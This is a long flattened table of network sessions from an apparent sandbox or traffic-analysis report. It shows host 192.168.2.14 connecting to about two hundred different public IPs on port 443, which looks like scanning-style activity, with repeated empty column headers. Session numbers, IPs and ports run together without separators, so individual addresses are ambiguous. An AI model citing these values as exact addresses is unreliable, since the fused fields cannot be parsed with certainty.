                                                      15996192.168.2.145644497.102.32.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15997192.168.2.146040872.114.70.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15998192.168.2.1459122172.160.237.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15999192.168.2.143859276.193.165.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16000192.168.2.145203074.63.128.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16001192.168.2.1457518210.140.190.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16002192.168.2.1457354171.160.121.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16003192.168.2.144781886.127.120.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16004192.168.2.1452220115.142.165.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16005192.168.2.1435246124.59.198.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16006192.168.2.145034695.172.84.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16007192.168.2.144208075.24.75.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16008192.168.2.1437336160.129.145.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16009192.168.2.1436382190.3.208.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16010192.168.2.1459528182.135.169.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16011192.168.2.145965849.83.80.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16012192.168.2.1445428155.34.245.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16013192.168.2.1457172133.177.160.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16014192.168.2.1438432116.67.37.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16015192.168.2.144238682.243.55.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16016192.168.2.1459076148.15.176.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16017192.168.2.1447496222.92.204.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16018192.168.2.145271054.99.159.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16019192.168.2.143486812.131.166.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16020192.168.2.1448902201.245.167.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16021192.168.2.144098246.193.132.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16022192.168.2.1435818118.180.139.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16023192.168.2.1444564172.65.8.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16024192.168.2.1456192112.85.238.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16025192.168.2.1449790216.153.144.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16026192.168.2.145202275.170.17.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16027192.168.2.1442144100.150.146.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16028192.168.2.145617080.60.160.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16029192.168.2.1448962175.3.31.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16030192.168.2.143578899.220.28.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16031192.168.2.1450384128.1.184.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16032192.168.2.145817289.222.102.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16033192.168.2.1437100212.132.150.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16034192.168.2.1450148209.17.126.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16035192.168.2.1434258154.125.106.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16036192.168.2.1437542213.197.194.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16037192.168.2.1450702213.152.14.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16038192.168.2.1457872161.174.51.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16039192.168.2.145731088.175.120.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16040192.168.2.144363449.51.148.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16041192.168.2.1434716194.160.47.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16042192.168.2.146016663.230.62.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16043192.168.2.144991690.174.13.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16044192.168.2.1435490211.45.140.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16045192.168.2.143952264.22.193.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16046192.168.2.1455408142.80.128.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16047192.168.2.1439494208.19.221.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16048192.168.2.1440368109.119.38.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16049192.168.2.1433138117.122.86.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16050192.168.2.1451040131.107.18.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16051192.168.2.144705638.37.17.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16052192.168.2.146005659.175.63.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16053192.168.2.1437774115.131.36.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16054192.168.2.1450624125.184.123.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16055192.168.2.145199039.26.201.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16056192.168.2.1440992157.88.249.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16057192.168.2.1457244213.55.212.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16058192.168.2.143382240.117.194.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16059192.168.2.143970045.60.135.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16060192.168.2.1457372194.234.218.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16061192.168.2.1448406117.209.92.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16062192.168.2.144616040.227.46.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16063192.168.2.145264235.6.53.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16064192.168.2.1437992148.128.31.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16065192.168.2.143566646.182.51.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16066192.168.2.143632025.24.89.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16067192.168.2.144941461.215.127.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16068192.168.2.143736269.225.84.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16069192.168.2.1459922122.49.188.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16070192.168.2.1457350187.32.72.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16071192.168.2.146010672.183.220.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16072192.168.2.1451468151.197.90.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16073192.168.2.1436730209.128.25.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16074192.168.2.145662613.24.99.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16075192.168.2.1439356203.151.92.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16076192.168.2.1439518155.203.241.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16077192.168.2.1444252187.136.17.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16078192.168.2.1445044109.125.205.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16079192.168.2.1433886131.140.190.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16080192.168.2.1435816206.56.153.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16081192.168.2.1453284179.50.194.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16082192.168.2.1459702210.218.84.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16083192.168.2.1447034201.189.159.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16084192.168.2.145741867.122.236.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16085192.168.2.145340892.172.48.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16086192.168.2.144952091.15.251.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16087192.168.2.1433104176.173.240.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16088192.168.2.1432848126.146.244.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16089192.168.2.1443554114.145.219.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16090192.168.2.1452314185.207.164.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16091192.168.2.145573237.128.131.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16092192.168.2.1434174218.99.27.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16093192.168.2.143708234.26.40.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16094192.168.2.1457358105.133.191.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16095192.168.2.145419260.241.27.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16096192.168.2.144715234.14.11.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16097192.168.2.1441728141.108.127.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16098192.168.2.144721270.91.114.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16099192.168.2.1450138171.160.121.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16100192.168.2.1433200196.192.83.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16101192.168.2.1456722108.182.76.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16102192.168.2.1444784176.105.128.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16103192.168.2.144391670.223.233.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16104192.168.2.143441275.65.38.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16105192.168.2.144371413.141.160.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16106192.168.2.1458414203.93.173.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16107192.168.2.1433372186.103.19.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16108192.168.2.1456454200.91.221.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16109192.168.2.1441732134.54.56.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16110192.168.2.1433014143.193.19.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16111192.168.2.145536438.48.78.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16112192.168.2.1442716223.232.249.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16113192.168.2.143596664.200.239.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16114192.168.2.1444466134.81.11.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16115192.168.2.144088248.243.193.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16116192.168.2.1460184199.77.29.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16117192.168.2.144613681.237.229.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16118192.168.2.1458596150.32.28.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16119192.168.2.1436434134.50.54.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16120192.168.2.1460262170.184.224.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16121192.168.2.144897458.152.76.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16122192.168.2.144376839.187.177.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16123192.168.2.1447238189.96.35.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16124192.168.2.144679287.182.111.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16125192.168.2.144848460.240.76.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16126192.168.2.144750858.232.134.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16127192.168.2.1458736194.11.190.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16128192.168.2.1440096216.147.248.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16129192.168.2.1434500142.39.20.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16130192.168.2.1444960123.107.104.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16131192.168.2.1436754111.67.186.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16132192.168.2.145085686.216.242.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16133192.168.2.143977449.88.141.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16134192.168.2.1434858103.200.54.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16135192.168.2.145220473.9.219.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16136192.168.2.145321054.134.107.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16137192.168.2.1444692136.26.173.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16138192.168.2.1454728130.52.13.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16139192.168.2.144891618.236.126.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16140192.168.2.1442300113.252.49.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16141192.168.2.1459986187.213.111.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16142192.168.2.1445954197.54.33.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16143192.168.2.1452504213.135.139.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16144192.168.2.1433836213.97.196.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16145192.168.2.1454722102.31.246.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16146192.168.2.145867451.12.131.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16147192.168.2.1456798210.23.183.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16148192.168.2.1450862209.197.180.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16149192.168.2.143831067.25.157.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16150192.168.2.145908467.245.60.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16151192.168.2.1459382153.10.38.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16152192.168.2.1453290106.228.210.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16153192.168.2.1447390202.180.177.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16154192.168.2.1445056219.251.50.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16155192.168.2.1459442178.217.146.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16156192.168.2.145260431.166.217.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16157192.168.2.145675866.101.50.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16158192.168.2.1447172104.37.93.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16159192.168.2.1433266117.71.10.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16160192.168.2.145268438.247.196.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16161192.168.2.143992299.43.174.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16162192.168.2.144828620.77.28.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16163192.168.2.145774049.252.95.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16164192.168.2.1443420139.57.226.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16165192.168.2.1450850159.47.81.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16166192.168.2.14578062.102.55.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16167192.168.2.143501242.252.200.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16168192.168.2.145422068.147.149.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16169192.168.2.143614652.143.177.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16170192.168.2.143611436.69.28.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16171192.168.2.143483692.71.77.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16172192.168.2.14548809.90.39.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16173192.168.2.1449382102.62.224.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16174192.168.2.143305860.204.148.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16175192.168.2.1436028122.186.0.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16176192.168.2.144817636.7.216.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16177192.168.2.1460760117.76.127.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16178192.168.2.1449986139.88.137.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16179192.168.2.1451178173.134.169.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16180192.168.2.144856646.139.182.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16181192.168.2.14481849.165.130.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16182192.168.2.145095249.120.155.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16183192.168.2.1452016208.108.79.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16184192.168.2.1455648147.185.249.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16185192.168.2.1446070144.109.109.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16186192.168.2.1459768122.152.111.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16187192.168.2.1441524112.208.59.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16188192.168.2.145110447.155.72.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16189192.168.2.1436566158.250.84.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16190192.168.2.1439822140.162.35.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16191192.168.2.145182488.67.160.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16192192.168.2.1449618117.252.142.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16193192.168.2.1448150153.172.187.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16194192.168.2.1454872220.92.203.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16195192.168.2.1432890199.48.236.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16196192.168.2.1438326137.246.239.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16197192.168.2.144327425.207.248.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16198192.168.2.1437072211.4.6.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16199192.168.2.1433490141.191.26.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16200192.168.2.1445420131.250.50.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16201192.168.2.145106679.240.11.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16202192.168.2.1438528199.44.183.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16203192.168.2.144771062.179.186.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16204192.168.2.145690885.174.223.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16205192.168.2.144523874.8.160.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16206192.168.2.145291444.92.255.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16207192.168.2.143344060.166.9.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16208192.168.2.143783452.247.94.109443
